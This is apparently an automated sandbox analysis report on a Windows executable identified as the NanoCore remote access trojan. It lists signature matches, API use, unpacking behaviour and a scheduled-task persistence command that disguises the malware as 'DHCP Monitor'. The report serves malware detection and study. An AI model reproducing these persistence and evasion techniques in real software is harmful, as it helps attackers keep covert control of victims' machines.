        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: classification engineClassification label: mal100.troj.evad.winEXE@18/24@16/1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_00401489
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_01
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ccf3c62d-d356-4a80-bb94-307bc35a5e01}
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Local\Temp\nsr9A59.tmpJump to behavior
        Source: bGf2H3tXGg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: bGf2H3tXGg.exe | Virustotal: Detection: 50%
        Source: bGf2H3tXGg.exe | ReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File read: C:\Users\user\Desktop\bGf2H3tXGg.exe
        Source: unknown | Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0
        Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0
        Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: bGf2H3tXGg.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp

        Data Obfuscation:

        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Unpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Unpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Detected unpacking (creates a PE file in dynamic memory)
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 22.2.dhcpmon.exe.2430000.4.unpack
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Unpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Unpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack
        .NET source code contains potential unpacker
